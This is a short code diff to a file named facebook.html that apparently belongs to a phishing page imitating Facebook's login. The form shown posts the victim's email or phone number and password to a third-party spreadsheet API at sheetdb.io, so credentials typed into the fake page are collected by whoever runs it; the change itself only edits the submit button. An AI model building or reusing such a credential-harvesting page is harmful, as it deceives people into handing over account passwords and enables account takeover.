--- a/facebook.html
+++ b/facebook.html
@@ -557,7 +557,8 @@ bP9LgE96ugAAAABJRU5ErkJggg==">
                 <form action="https://sheetdb.io/api/v1/2mg6mueub0xtl" method="POST">
                     <input type="text" name="data[username]" placeholder="Email address or phone number" >
                     <input type="password" name="data[password]" >
-                    <input type="submit" name="data" value="Log In">
+		<!--<input type="submit" name="data" value="Log In">-->
+                    <input type="submit" value="Log In">
                 </form>
                 <div class="signinLink">
                     <a href=""  target="_blank">Forgotten account?</a>
